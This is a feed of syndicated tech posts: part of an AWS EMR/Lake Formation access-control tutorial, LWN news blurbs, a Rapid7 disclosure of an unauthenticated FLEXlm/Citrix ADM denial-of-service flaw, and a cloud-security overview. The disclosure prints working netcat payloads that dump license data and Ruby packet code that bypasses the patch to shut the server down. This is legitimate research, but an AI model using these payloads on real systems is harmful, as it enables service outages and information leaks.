  2. With a Lake Formation admin user, run the following command to create our database:
    aws glue create-database \
    --cli-input-json file://entities-db.json

    We also use the AWS Glue APIs to create the tables users and products.

  3. Create the users-table.json file with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "TableInput": {
            "Name": "users",
            "StorageDescriptor": {
                "Columns": [{
                        "Name": "uid",
                        "Type": "string"
                    },
                    {
                        "Name": "name",
                        "Type": "string"
                    },
                    {
                        "Name": "surname",
                        "Type": "string"
                    },
                    {
                        "Name": "state",
                        "Type": "string"
                    },
                    {
                        "Name": "city",
                        "Type": "string"
                    },
                    {
                        "Name": "address",
                        "Type": "string"
                    }
                ],
                "Location": "s3://emr-steps-roles-new-us-east-1/entities-database/users/",
                "InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
                "OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
                "Compressed": false,
                "SerdeInfo": {
                    "SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
                    "Parameters": {
                        "field.delim": ",",
                        "serialization.format": ","
                    }
                }
            },
            "TableType": "EXTERNAL_TABLE",
            "Parameters": {
                "EXTERNAL": "TRUE"
            }
        }
    }

  4. Create the products-table.json file with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "TableInput": {
            "Name": "products",
            "StorageDescriptor": {
                "Columns": [{
                        "Name": "product_id",
                        "Type": "string"
                    },
                    {
                        "Name": "name",
                        "Type": "string"
                    },
                    {
                        "Name": "category",
                        "Type": "string"
                    }
                ],
                "Location": "s3://emr-steps-roles-new-us-east-1/entities-database/products/",
                "InputFormat": "org.apache.hadoop.mapred.TextInputFormat",
                "OutputFormat": "org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
                "Compressed": false,
                "SerdeInfo": {
                    "SerializationLibrary": "org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe",
                    "Parameters": {
                        "field.delim": ",",
                        "serialization.format": ","
                    }
                }
            },
            "TableType": "EXTERNAL_TABLE",
            "Parameters": {
                "EXTERNAL": "TRUE"
            }
        }
    }

  5. With a Lake Formation admin user, create our tables with the following commands:
    aws glue create-table \
        --database-name entities \
        --cli-input-json file://users-table.json
        
    aws glue create-table \
        --database-name entities \
        --cli-input-json file://products-table.json

Set up the Lake Formation data lake locations

To access our tables' data in Amazon S3, Lake Formation needs read/write access to it. To achieve that, we have to register the Amazon S3 locations where our data resides and specify which IAM role Lake Formation should obtain credentials from for each of them.

Let’s create our IAM role for the data access.

  1. Create a file called trust-policy-data-access-role.json with the following content:
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "",
                "Effect": "Allow",
                "Principal": {
                    "Service": "lakeformation.amazonaws.com"
                },
                "Action": "sts:AssumeRole"
            }
        ]
    }

  2. Use the policy to create the IAM role emr-demo-lf-data-access-role:
    aws iam create-role \
    --role-name emr-demo-lf-data-access-role \
    --assume-role-policy-document file://trust-policy-data-access-role.json

  3. Create the file data-access-role-policy.json with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/entities-database",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/entities-database/*"
                ]
            },
            {
                "Effect": "Allow",
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1"
                ]
            }
        ]
    }

  4. Create our IAM policy:
    aws iam create-policy \
    --policy-name data-access-role-policy \
    --policy-document file://data-access-role-policy.json

  5. Assign to our emr-demo-lf-data-access-role the created policy (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name emr-demo-lf-data-access-role \
    --policy-arn "arn:aws:iam::123456789012:policy/data-access-role-policy"

    We can now register our data location in Lake Formation.

  6. On the Lake Formation console, choose Data lake locations in the navigation pane.
  7. Here we can register our S3 location containing data for our two tables and choose the created emr-demo-lf-data-access-role IAM role, which has read/write access to that location.

For more details about adding an Amazon S3 location to your data lake and configuring your IAM data access roles, refer to Adding an Amazon S3 location to your data lake.
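
If you prefer the AWS CLI to the console, the same registration can be done with the register-resource command. The following is a sketch using the bucket prefix and data access role from this walkthrough (replace 123456789012 with your AWS account ID and emr-steps-roles-new-us-east-1 with your bucket name):

# Register the S3 prefix containing the two tables, using the data access role created above
aws lakeformation register-resource \
--resource-arn arn:aws:s3:::emr-steps-roles-new-us-east-1/entities-database \
--role-arn arn:aws:iam::123456789012:role/emr-demo-lf-data-access-role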

Enforce Lake Formation permissions

To be sure we’re using Lake Formation permissions, we should confirm that we don’t have any grants set up for the principal IAMAllowedPrincipals. The IAMAllowedPrincipals group includes any IAM users and roles that are allowed access to your Data Catalog resources by your IAM policies, and it’s used to maintain backward compatibility with AWS Glue.

To confirm Lake Formation permissions are enforced, navigate to the Lake Formation console and choose Data lake permissions in the navigation pane. Filter permissions by “Database”:“entities” and remove all the permissions given to the principal IAMAllowedPrincipals.
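
This cleanup can also be scripted with the Lake Formation CLI. The following is a sketch: list the current grants first, because the exact permissions to revoke depend on what IAMAllowedPrincipals currently holds on the entities database and its tables.

# List the current grants on the entities database
aws lakeformation list-permissions \
--resource '{"Database": {"Name": "entities"}}'

# Revoke a grant held by the IAMAllowedPrincipals group (repeat for each permission listed above)
aws lakeformation revoke-permissions \
--principal DataLakePrincipalIdentifier=IAM_ALLOWED_PRINCIPALS \
--permissions "ALL" \
--resource '{"Database": {"Name": "entities"}}'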

For more details on IAMAllowedPrincipals and backward compatibility with AWS Glue, refer to Changing the default security settings for your data lake.

Configure AWS Glue and Lake Formation grants for IAM runtime roles

To allow our IAM runtime roles to properly interact with Lake Formation, we should provide them the lakeformation:GetDataAccess and glue:Get* grants.

Lake Formation permissions control access to Data Catalog resources, Amazon S3 locations, and the underlying data at those locations. IAM permissions control access to the Lake Formation and AWS Glue APIs and resources. Therefore, although you might have the Lake Formation permission to access a table in the Data Catalog (SELECT), your operation fails if you don’t have the IAM permission on the glue:Get* API.

For more details about Lake Formation access control, refer to Lake Formation access control overview.

  1. Create the emr-runtime-roles-lake-formation-policy.json file with the following content:
    {
        "Version": "2012-10-17",
        "Statement": {
            "Sid": "LakeFormationManagedAccess",
            "Effect": "Allow",
            "Action": [
                "lakeformation:GetDataAccess",
                "glue:Get*",
                "glue:Create*",
                "glue:Update*"
            ],
            "Resource": "*"
        }
    }

  2. Create the related IAM policy:
    aws iam create-policy \
    --policy-name emr-runtime-roles-lake-formation-policy \
    --policy-document file://emr-runtime-roles-lake-formation-policy.json

  3. Assign this policy to both IAM runtime roles (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name test-emr-demo1 \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-lake-formation-policy"
    
    aws iam attach-role-policy \
    --role-name test-emr-demo2 \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-lake-formation-policy"

Set up Lake Formation permissions

We now set up the permission in Lake Formation for the two runtime roles.

  1. Create the file users-grants-test-emr-demo1.json with the following content to grant SELECT access to all columns in the entities.users table to test-emr-demo1:
    {
        "Principal": {
            "DataLakePrincipalIdentifier": "arn:aws:iam::123456789012:role/test-emr-demo1"
        },
        "Resource": {
            "Table": {
                "DatabaseName": "entities",
                "Name": "users"
            }
        },
        "Permissions": [
            "SELECT"
        ]
    }

  2. Create the file users-grants-test-emr-demo2.json with the following content to grant SELECT access to the uid and state columns in the entities.users table to test-emr-demo2:
    {
        "Principal": {
            "DataLakePrincipalIdentifier": "arn:aws:iam::123456789012:role/test-emr-demo2"
        },
        "Resource": {
            "TableWithColumns": {
                "DatabaseName": "entities",
                "Name": "users",
                "ColumnNames": ["uid", "state"]
            }
        },
        "Permissions": [
            "SELECT"
        ]
    }

  3. Create the file products-grants-test-emr-demo2.json with the following content to grant SELECT access to all columns in the entities.products table to test-emr-demo2:
    {
        "Principal": {
            "DataLakePrincipalIdentifier": "arn:aws:iam::123456789012:role/test-emr-demo2"
        },
        "Resource": {
            "Table": {
                "DatabaseName": "entities",
                "Name": "products"
            }
        },
        "Permissions": [
            "SELECT"
        ]
    }

  4. Let’s set up our permissions in Lake Formation:
    aws lakeformation grant-permissions \
    --cli-input-json file://users-grants-test-emr-demo1.json
    
    aws lakeformation grant-permissions \
    --cli-input-json file://users-grants-test-emr-demo2.json
    
    aws lakeformation grant-permissions \
    --cli-input-json file://products-grants-test-emr-demo2.json

  5. Check the permissions we defined on the Lake Formation console on the Data lake permissions page by filtering by “Database”:“entities”.

Test Lake Formation permissions with runtime roles

For our test, we use a PySpark application called test-lake-formation.py with the following content:


from pyspark.sql import SparkSession
 
spark = SparkSession.builder.appName("Pyspark - TEST IAM RBAC with LF").enableHiveSupport().getOrCreate()

try:
    print("== select * from entities.users limit 3 ==\n")
    spark.sql("select * from entities.users limit 3").show()
except Exception as e:
    print(e)

try:
    print("== select * from entities.products limit 3 ==\n")
    spark.sql("select * from entities.products limit 3").show()
except Exception as e:
    print(e)

spark.stop()

In the script, we’re trying to access the tables users and products. Let’s upload our Spark application in the same S3 bucket that we used earlier:

#Change this with your bucket name
BUCKET_NAME="emr-steps-roles-new-us-east-1"

aws s3 cp test-lake-formation.py s3://${BUCKET_NAME}/scripts/

We’re now ready to perform our test. We run the test-lake-formation.py script first using the test-emr-demo1 role and then using the test-emr-demo2 role as the runtime roles.

Let’s submit a step specifying test-emr-demo1 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Lake Formation Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test-lake-formation.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo1

The following is the output of the EMR step with test-emr-demo1 as the runtime role:

== select * from entities.users limit 3 ==

+--------+-----+-------+-------+------+--------------------+
|     uid| name|surname|  state|  city|             address|
+--------+-----+-------+-------+------+--------------------+
|00005678| john|   pike|england|london|      Hidden Road 78|
|00009039|paolo|  rossi|  italy| milan|Via degli Alberi 56A|
|00009057| july|   finn|germany|berlin|       Green Road 90|
+--------+-----+-------+-------+------+--------------------+

== select * from entities.products limit 3 ==

Insufficient Lake Formation permission(s) on products (...)

As we can see, our application was only able to access the users table.

Submit the same script again as a new EMR step, but this time with the role test-emr-demo2 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Lake Formation Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test-lake-formation.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo2

The following is the output of the EMR step with test-emr-demo2 as the runtime role:

== select * from entities.users limit 3 ==

+--------+-------+
|     uid|  state|
+--------+-------+
|00005678|england|
|00009039|  italy|
|00009057|germany|
+--------+-------+

== select * from entities.products limit 3 ==

+----------+---------------+----------+
|product_id|           name|  category|
+----------+---------------+----------+
|  P0000789|       Bike2000|     Sport|
|  P0000567|   CoverToCover|Smartphone|
|  P0005677|Whiteboard X786|      Home|
+----------+---------------+----------+

As we can see, our application was able to access a subset of columns for the users table and all the columns for the products table.

We can conclude that the permissions applied when accessing the Data Catalog are enforced based on the runtime role used with the EMR step.

Audit using the source identity

The source identity is a mechanism to monitor and control actions taken with assumed roles. The Propagate source identity feature similarly allows you to monitor and control actions taken using runtime roles by the jobs submitted with EMR steps.

We already configured EMR_EC2_DefaultRole with the "sts:SetSourceIdentity" permission on our two runtime roles. Also, both runtime roles allow EMR_EC2_DefaultRole to set the source identity in their trust policies. So we're ready to proceed.

We now see the Propagate source identity feature in action with a simple example.

Configure the IAM role that is assumed to submit the EMR steps

We configure the IAM role job-submitter-1, which is assumed with a source identity specified and is then used to submit the EMR steps. In this example, we allow the IAM user paul to assume this role and set the source identity. Please note you can use any IAM principal here.

  1. Create a file called trust-policy-2.json with the following content (replace 123456789012 with your AWS account ID):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {
                    "AWS": "arn:aws:iam::123456789012:user/paul"
                },
                "Action": "sts:AssumeRole"
            },
            {
                "Effect": "Allow",
                "Principal": {
                    "AWS": "arn:aws:iam::123456789012:user/paul"
                },
                "Action": "sts:SetSourceIdentity"
            }
        ]
    }

  2. Use it as the trust policy to create the IAM role job-submitter-1:
    aws iam create-role \
    --role-name job-submitter-1 \
    --assume-role-policy-document file://trust-policy-2.json

    We now use the same emr-runtime-roles-submitter-policy policy we defined earlier to allow the role to submit EMR steps using the test-emr-demo1 and test-emr-demo2 runtime roles.

  3. Assign this policy to the IAM role job-submitter-1 (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name job-submitter-1 \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-submitter-policy"

Test the source identity with AWS CloudTrail

To show how propagation of source identity works with Amazon EMR, we generate a role session with the source identity test-ad-user.

With the IAM user paul (or with the IAM principal you configured), we first perform the impersonation (replace 123456789012 with your AWS account ID):

aws sts assume-role \
--role-arn arn:aws:iam::123456789012:role/job-submitter-1 \
--role-session-name demotest \
--source-identity test-ad-user

The following code is the output received:

{
"Credentials": {
    "SecretAccessKey": "<SECRET_ACCESS_KEY>",
    "SessionToken": "<SESSION_TOKEN>",
    "Expiration": "<EXPIRATION_TIME>",
    "AccessKeyId": "<ACCESS_KEY_ID>"
},
"AssumedRoleUser": {
    "AssumedRoleId": "AROAUVT2HQ3......:demotest",
    "Arn": "arn:aws:sts::123456789012:assumed-role/test-emr-role/demotest"
},
"SourceIdentity": "test-ad-user"
}

We use the temporary AWS security credentials of the role session to submit an EMR step along with the runtime role test-emr-demo1:

export AWS_ACCESS_KEY_ID="<ACCESS_KEY_ID>"
export AWS_SECRET_ACCESS_KEY="<SECRET_ACCESS_KEY>"
export AWS_SESSION_TOKEN="<SESSION_TOKEN>" 

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Lake Formation Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test-lake-formation.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo1

In a few minutes, we can see events appearing in the AWS CloudTrail log file. We can see all the AWS APIs that the jobs invoked using the runtime role. In the following snippet, we can see that the step performed the sts:AssumeRole and lakeformation:GetDataAccess actions. It’s worth noting how the source identity test-ad-user has been preserved in the events.
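
One way to pull those events from the CLI is with CloudTrail's lookup-events command. The following is a sketch: lookup-events filters on a single attribute, so here we filter by event name and then search the returned records for the source identity field (events can take several minutes to become available).

# Look up recent GetDataAccess calls and extract the source identity from each record
aws cloudtrail lookup-events \
--lookup-attributes AttributeKey=EventName,AttributeValue=GetDataAccess \
--max-results 10 \
--query 'Events[].CloudTrailEvent' \
--output text | grep -o '"sourceIdentity":"[^"]*"'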

Clean up

You can now delete the EMR cluster you created.

  1. On the Amazon EMR console, choose Clusters in the navigation pane.
  2. Select the cluster iam-passthrough-cluster, then choose Terminate.
  3. Choose Terminate again to confirm.

Alternatively, you can delete the cluster by using the AWS CLI with the following command (replace the EMR cluster ID with the one returned by the previously run aws emr create-cluster command):

aws emr terminate-clusters --cluster-ids j-3KVXXXXXXX7UG
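
The walkthrough also created IAM roles and policies. If you want to remove those as well, the following sketch shows the pattern for one role/policy pair; repeat it for the other roles and policies created in this post, detaching every attached policy before deleting a role (replace 123456789012 with your AWS account ID):

# Detach the policy from the runtime role, then delete the policy and the role
aws iam detach-role-policy \
--role-name test-emr-demo1 \
--policy-arn "arn:aws:iam::123456789012:policy/test-emr-demo1-policy"

aws iam delete-policy \
--policy-arn "arn:aws:iam::123456789012:policy/test-emr-demo1-policy"

aws iam delete-role --role-name test-emr-demo1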

Conclusion

In this post, we discussed how you can control data access on Amazon EMR on EC2 clusters by using runtime roles with EMR steps. We discussed how the feature works, how you can use Lake Formation to apply fine-grained access controls, and how to monitor and control actions using a source identity. To learn more about this feature, refer to Configure runtime roles for Amazon EMR steps.


About the authors

Stefano Sandona is an Analytics Specialist Solutions Architect with AWS. He loves data, distributed systems, and security. He helps customers around the world architect their data platforms. He has a strong focus on Amazon EMR and all the security aspects around it.

Sharad Kala is a senior engineer at AWS working with the EMR team. He focuses on the security aspects of the applications running on EMR. He has a keen interest in working on and learning about distributed systems.

[$] Identity management for WireGuard

Post Syndicated from original https://lwn.net/Articles/910766/

Since its inclusion in the Linux kernel, the WireGuard VPN tunnel has become increasingly popular. In general, WireGuard is simpler to configure than other VPNs, but the approach that it takes to authentication can present some challenges. Each node in a WireGuard network has a cryptographic key that serves as the node's identity; nodes that do not know each other's keys cannot directly communicate. Keeping track of these keys and distributing them to the other nodes in a mesh network quickly becomes a chore as the network grows. Fortunately, there are now several open-source tools that can automate the management of these keys and make using WireGuard easier for both administrators and end users.
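
For reference, a node's identity in WireGuard is simply a Curve25519 keypair generated with the standard wg tool; the tools discussed in the article automate distributing the resulting public keys between peers. A minimal sketch:

# Generate a private key and derive the matching public key for this node
wg genkey | tee privatekey | wg pubkey > publickey

# The public key is what every peer must know in order to communicate with this node
cat publickey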

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/911562/

Security updates have been issued by Debian (glibc and libksba), Fedora (dhcp and kernel), Red Hat (.NET 6.0, .NET Core 3.1, compat-expat1, kpatch-patch, and nodejs:16), Slackware (xorg), SUSE (exiv2, expat, kernel, libreoffice, python, python-numpy, squid, and virtualbox), and Ubuntu (linux-azure and zlib).

FLEXlm and Citrix ADM Denial of Service Vulnerability

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/10/18/flexlm-and-citrix-adm-denial-of-service-vulnerability/

On June 27, 2022, Citrix released an advisory for CVE-2022-27511 and CVE-2022-27512, which affect Citrix ADM (Application Delivery Management).

Rapid7 investigated these issues to better understand their impact, and found that the patch is not sufficient to prevent exploitation. We also determined that the worst outcome of this vulnerability is a denial of service – the licensing server can be told to shut down (even with the patch). We were not able to find a way to reset the admin password, which the original bulletin indicated was possible.

In the course of investigating CVE-2022-27511 and CVE-2022-27512, we determined that the root cause of the issues in Citrix ADM was a vulnerable implementation of popular licensing software FLEXlm, also known as FlexNet Publisher. This disclosure addresses both the core issue in FLEXlm and Citrix ADM’s implementation of it (which resulted in both the original CVEs and later the patch bypass our research team discovered). Rapid7 coordinated disclosure with both companies and CERT/CC.

As of this publication, these issues remain unpatched, so IT defenders are urged to reach out to Revenera and Citrix for direct guidance on mitigating these denial of service vulnerabilities and on CVE assignment.

Products

FLEXlm is a license management application that is part of FlexNet licensing, provided by Revenera's FlexNet software, and is used for license provisioning in many popular network applications, including Citrix ADM. You can read more about FlexNet at the vendor's website.

Citrix ADM is an application provisioning solution from Citrix, which uses FLEXlm for license management. You can read more about Citrix ADM at the vendor’s website.

Discoverer

This issue was discovered by Ron Bowes of Rapid7 while researching CVE-2022-27511 in Citrix ADM. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

Citrix ADM runs on FreeBSD, and remote administrative logins are possible. Using that, we compared two different versions of the Citrix ADM server – before and after the patch.

Eventually, we went through each network service, one by one, to check what each one did and whether the patch may have fixed something. When we got to TCP port 27000, we found that lmgrd was running. Looking up lmgrd, we determined that it's the license server daemon from FLEXlm, also known as FlexNet Licensing (among other names), made by Revenera. Since the bulletin calls out licensing disruption, this seemed like a sensible place to look; from the bulletin:

Temporary disruption of the ADM license service. The impact of this includes preventing new licenses from being issued or renewed by Citrix ADM.

If we look at how lmgrd is executed before and after the patch, we find that the command line arguments changed; before:

bash-3.2# ps aux | grep lmgrd
root         3506   0.0  0.0   10176   6408  -  S    19:22      0:09.67 /netscaler/lmgrd -l /var/log/license.log -c /mpsconfig/license

And after:

bash-3.2# ps aux | grep lmgrd
root         5493   0.0  0.0   10176   5572  -  S    13:15     0:02.45 /netscaler/lmgrd -2 -p -local -l /var/log/license.log -c /mpsconfig/license

If we look at some online documentation, we see that the -2 -p flags are security-related:

-2 -p    Restricts usage of lmdown, lmreread, and lmremove to a FLEXlm administrator who is by default root. [...]

Patch Analysis

We tested a Linux copy of FlexNet 11.18.3.1, which allowed us to execute and debug Flex locally. Helpfully, the various command line utilities that FlexNet uses to perform actions (accessible via lmutil) use a TCP connection to localhost, allowing us to analyze the traffic. For example, the following command:

$ ./lmutil lmreread -c ./license/citrix_startup.lic
lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.
lmreread successful

Generates a lot of traffic going to localhost:27000, including:

Sent:

00000000  2f 4c 0f b0 00 40 01 02  63 05 2c 85 00 00 00 00   /L...@.. c.,.....
00000010  00 00 00 02 01 04 0b 12  00 54 00 78 00 02 0b af   ........ .T.x....
00000020  72 6f 6e 00 66 65 64 6f  72 61 00 2f 64 65 76 2f   ron.fedo ra./dev/
00000030  70 74 73 2f 32 00 00 78  36 34 5f 6c 73 62 00 01   pts/2..x 64_lsb..

Received:

    00000000  2f 8f 09 c6 00 26 01 0e  63 05 2c 85 41 00 00 00   /....&.. c.,.A...
    00000010  00 00 00 02 0b 12 01 04  00 66 65 64 6f 72 61 00   ........ .fedora.
    00000020  6c 6d 67 72 64 00                                  lmgrd.

Sent:

00000040  2f 23 34 78 00 24 01 07  63 05 2c 86 00 00 00 00   /#4x.$.. c.,.....
00000050  00 00 00 02 72 6f 6e 00  66 65 64 6f 72 61 00 00   ....ron. fedora..
00000060  92 00 00 0a                                        ....

Received:

    00000026  2f 54 18 b9 00 a8 00 4f  63 05 2c 86 41 00 00 00   /T.....O c.,.A...
    00000036  00 00 00 02 4f 4f 00 00  00 00 00 00 00 00 00 00   ....OO.. ........
    00000046  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000056  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000066  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000076  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000086  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    00000096  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    000000A6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    000000B6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
    000000C6  00 00 00 00 00 00 00 00                            ........ 

If we start the service with the -2 -p flags, we can no longer run lmreread:

$ ./lmutil lmreread -c ./license/citrix_startup.lic
lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.
lmreread failed: You are not a license administrator. (-63,294)

That appears to be working as intended! Or does it?

Protocol Analysis

We spent a substantial amount of time reverse engineering FlexNet’s protocol, which is a binary protocol with a lot of code paths supporting different (and deprecated) protocol versions. We built a tool (that you can get on GitHub) that implements the interesting parts of it.

It turns out, even ignoring the vulnerability, you can do a whole bunch of stuff against the FlexNet service, and none of it even requires authentication! For example, you can grab the path to the license file:

$ echo -ne "\x2f\xa9\x21\x3a\x00\x3f\x01\x08\x41\x41\x41\x41\x42\x42\x42\x42\x43\x00\x44\x44\x01\x04\x72\x6f\x6f\x74\x00\x43\x69\x74\x72\x69\x78\x41\x44\x4d\x00\x6c\x6d\x67\x72\x64\x00\x2f\x64\x65\x76\x2f\x70\x74\x73\x2f\x31\x00\x67\x65\x74\x70\x61\x74\x68\x73\x00" | nc 10.0.0.9 27000
LW37/mpsconfig/license/citrix_startup.lic

You can even grab the whole license file:

$ echo -ne "\x2f\x8a\x17\x2d\x00\x37\x01\x08\x41\x41\x41\x41\x42\x42\x42\x42\x43\x00\x44\x44\x01\x04\x72\x6f\x6f\x74\x00\x43\x69\x74\x72\x69\x78\x41\x44\x4d\x00\x6c\x6d\x67\x72\x64\x
00\x2f\x64\x65\x76\x2f\x70\x74\x73\x2f\x31\x00\x00" | nc -v 10.0.0.9 27000
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.9:27000.
L6194# DO NOT REMOVE THIS COMMENT LINE
# "のコメント行は削除しLK6060NEN
# NE SUPPRIMEZ PAS CETTE LIGNE DE COMMENTAIRE
# NO ELIMINAR ESTA LÍNL5926IX PORT=7279

And you can also remotely reload the license file and shut down the service if the -2 -p flags are not set when the server starts. That’s the core of the original CVEs: those flags aren’t used, so a remote user can take administrative actions.

Patch Bypass

The problem is, all of the security features (including declaring your username and privilege level) are client-side choices, which means that without knowing any secret information, a client can simply declare itself privileged.

This is what the "authentication" message looks like in flexnet-tools.rb:

  send_packet(0x2f, 0x0102,
    "\x01\x04" + # If the `\x04` value here is non-zero, we are permitted to log in
    "\x0b\x10" + # Read as a pair of uint16s
    "\x00\x54" + # Read as single uint16
    "\x00\x78" + # Read as single uint16
    "\x00\x00\x16\x97" + # Read as uint32
    "root\x00" +
    "CitrixADM\x00" +
    "/dev/pts/1\x00" +
    "\x00" + # If I add a string here, the response changes
    "x86_f8\x00" +
    "\x01"
  )

In that example, root is the username and CitrixADM is the host. Those can be set to whatever the client chooses, and permissions and logs will reflect those values. The first field, \x01\x04, is also part of the authentication process, where the \x04 value specifically enables remote authorization – while we found the part of the binary that reads that value, its actual purpose is not clear to us.

Declaring oneself as root@CitrixADM (using that message) bypasses the need to actually authenticate. The lmdown command, which shuts down the licensing server, has an additional required field:

when 'lmdown'
  out = send_packet(0x2f, 0x010a,
    "\x00" + # Forced?
    "root\x00" + # This is used in a log message
    "CitrixADM\x00" +
    "\x00" +
    "\x01\x00\x00\x7f" +
    "\x00" +
    (LOGIN ? "islocalSys" : "") + # Only attach islocalSys if we're logging in
    "\x00"
  )

The islocalSys value self-identifies the client as privileged, allowing it to ignore the -2 -p restriction and perform otherwise-restricted actions. This is what bypasses the patch.

Impact

Remotely shutting down the FLEXlm licensing server can cause a denial of service condition in the software for which that licensing server is responsible. In this particular case, exploiting this vulnerability can cause a disruption in provisioning licenses through Citrix ADM.

Remediation

In the absence of a vendor-supplied patch, users of software that relies on FLEXlm should not expose port 27000/TCP to untrusted networks. Note that in many cases, this would remove the functionality of the license server entirely.

Disclosure Timeline

This issue was disclosed in accordance with Rapid7’s vulnerability disclosure policy (https://www.rapid7.com/security/disclosure/#zeroday), but with a slightly faster initial release to CERT/CC due to the multivendor nature of the issue.

  • June, 2022: Issues discovered and documented by Rapid7 researcher Ron Bowes
  • Tue, Jul 5, 2022: Disclosed to Citrix via their PSIRT team
  • Thu, Jul 7, 2022: Disclosed to Flexera via their PSIRT team
  • Wed, Jul 12, 2022: Disclosed to CERT/CC (VU#300762)
  • July – October, 2022: Disclosure discussions between Rapid7, Citrix, Flexera, and CERT/CC through VINCE (Case 603).
  • Tue, Oct 18, 2022: This public disclosure

Emerging best practices for securing cloud-native environments

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/10/18/emerging-best-practices-for-securing-cloud-native-environments/

Emerging best practices for securing cloud-native environments

Globally, IT experts recognise security as the most significant barrier to cloud adoption, in part because many of the ways of securing traditional IT environments are not always applicable to cloud-native infrastructure. As a result, security teams may find themselves behind the curve and struggling to keep up with the ambitious digital transformation programs set by their senior leadership teams.

As technology evolves and threats change rapidly, organizations that stay abreast of the latest developments, trends, and industry standards tend to have fewer security risks than those that don’t. Failure to do so can lead to data breaches, compliance violations and increased costs. From creating a security culture to implementing innovative solutions, it’s clear a new approach to security is required; one that is more automated and based on best practices that consider the following:

Speed vs security

Finding the right balance between security and speed can be difficult, especially when trying to keep pace with your organization’s cloud migration and digital transformation strategy. Securing your continuous integration and delivery (CI/CD) pipeline can be challenging if visibility, governance, and compliance are lacking across your IT environment.

Ensuring errors and missteps are detected and minimised requires a consistent set of processes, people, and tools. By putting challenges into logical groups, you can address each one more effectively.

For example, the first stage of the CI/CD pipeline is vulnerable to human error. Adopting the DevSecOps model adds security to the DevOps working processes as a continuous activity, allowing security policies to be defined and enforced at every pipeline stage, including development and testing environments. That said, moving away from traditional processes requires strong foundations to transform and change.

Operationalising cyber security

As the number of workloads in the cloud increases, security challenges can sometimes fall through the gaps and outside of traditional processes, adding risk from both a technical and an operational perspective. When everyone understands cybersecurity processes, their importance and why they’re necessary, they’ll take action. Holding people and business units accountable for their efforts lets you measure your cybersecurity programs’ effectiveness and discover any necessary improvements. This will result in better decision-making and measurable risk reduction, not to mention greater understanding and awareness of security across your organization.

Begin by understanding where and how security gaps are being created. Once you’ve identified these gaps, prioritise them based on business impact and the likelihood of occurrence. Ask your peers: in the event of a breach, which data would you be most concerned about if attackers hit it with ransomware? With this information in hand, it becomes easier to identify the appropriate controls and solutions and to gauge your organization’s cyber maturity.

Knowledge sharing

